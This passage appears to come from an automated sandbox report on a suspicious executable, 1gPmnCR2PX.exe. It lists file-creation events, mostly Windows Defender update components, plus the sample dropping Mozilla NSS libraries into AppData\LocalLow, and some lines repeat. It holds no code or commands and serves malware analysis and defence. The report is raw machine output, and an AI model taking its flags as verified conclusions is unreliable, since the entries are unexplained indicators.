Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\prldap60.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\nss3.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\nssckbi.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ta-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\uk-UA\MpAsDesc.dll.mui Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ca-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nl-NL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ug-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\uk-UA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\eu-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\he-IL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ta-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\uk-UA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\kk-KZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pl-PL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mi-NZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sl-SI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\gu-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pl-PL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCommu.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hr-HR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\is-IS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sk-SK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ro-RO\MpAsDesc.dll.mui Jump to dropped file
